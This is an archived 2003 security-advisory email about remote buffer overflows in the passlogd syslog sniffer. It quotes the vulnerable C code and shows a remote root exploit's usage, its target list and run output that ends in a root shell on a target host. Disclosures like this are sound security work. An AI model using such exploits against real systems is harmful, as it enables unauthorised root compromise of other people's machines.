[EXPL] Remote Multiple Buffer Overflow Vulnerabilities in Passlogd Sniffer
From: support@securiteam.com
Date: 04/06/03
- Previous message: support@securiteam.com: "[NT] Quick Time Media Player for Windows Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 6 Apr 2003 11:31:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Remote Multiple Buffer Overflow Vulnerabilities in Passlogd Sniffer
------------------------------------------------------------------------
SUMMARY
<http://www.securityfocus.com/tools/2076> passlogd (passive syslog
capture daemon) is a purpose-built sniffer for capturing syslog messages
in transit; this allows for backup logging to be performed on a machine
with no open ports.
Several buffer overflow vulnerabilities allows a remote user to crash the
program.
DETAILS
The vulnerability originates in sl_parse() function to 33 lines of
'passlogd-0.1d/parse.c' code.
__
33 void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
34 {
...
42 char level[5];
43 char message[1024];
44 char buffer[4096];
...
77 while(pkt[i] != '>'){
78 level[j] = pkt[i]; // First, buffer overflow happens.
79 i++;
80 j++;
81 }
82 i++;
...
87 while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen -
1)){
88 if(debug)
89 printf("at byte %d of %d\n", i, pkthdr->caplen -
1);
90 message[z] = pkt[i]; // Second, buffer overflow happens.
91 i++;
92 z++;
93 }
...
103 /* built the logstring */
104 if(dflag){
105 sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous.
106 }
107 else {
108 sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level,
message) // Similarly, is dangerous.
;
109 }
... /* Role of original is like this. */
123 syslev = atoi(level);
124 openlog("passlogd", 0, LOG_DAEMON);
125 syslog(syslev, "%s", buffer);
--
Visual points that the program flow changes, when the stack variables are
overwritten. Of course, the frame pointer overrun exists as well.
Exploit code:
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument]
-h - hostname.
-f - spoof src ip.
-s - &shellcode.
-l - buf len.
-t - target number.
-i - help information.
Select target number:
{0} ALZZA Linux release 6.1 (Linux One)
{1} WOW Linux release 6.2 (Puberty)
{2} RedHat Linux release 7.0 (Guinness)
{3} WOWLiNUX Release 7.1 (Paran)
{4} RedHat Linux release 8.0 (Psyche)
Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3
Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582
bash-2.04#
test exploit result: --
#1) attacker system:
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2
-s0x82828282
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
[0] Set packet code size.
[1] Set protocol header.
[2] Make shellcode.
[3] Set rawsock.
[4] Send packet.
[5] Trying 61.37.xxx.xx:36864.
[-] Connect Failed.
bash-2.04#
#2) target system:
[root@blah /passlogd-0.1d]# gdb -q ./passlogd
(gdb) r
Starting program: /passlogd-0.1d/./passlogd
Wed Mar 26 12:16:27 2003
to
: <
>
r^) F @ F @ F N f C F f
^ F )
F f F N N N f ^ CC f V V fC ?) ?A ?A V v K
/bin/shd
Program received signal SIGSEGV, Segmentation fault.
0x82828282 in ?? ()
(gdb)
real exploit result: --
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
[0] Set packet code size.
[1] Set protocol header.
[2] Make shellcode.
[3] Set rawsock.
[4] Send packet.
[5] Trying 61.37.xxx.xx:36864.
[*] Connected to 61.37.xxx.xx:36864.
[*] Executed shell successfully !
Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@blah /passlogd-0.1d]#
-- ADDITIONAL INFORMATION The information has been provided by <http://www.inetcop.org> INetCop Security Home. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Quick Time Media Player for Windows Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
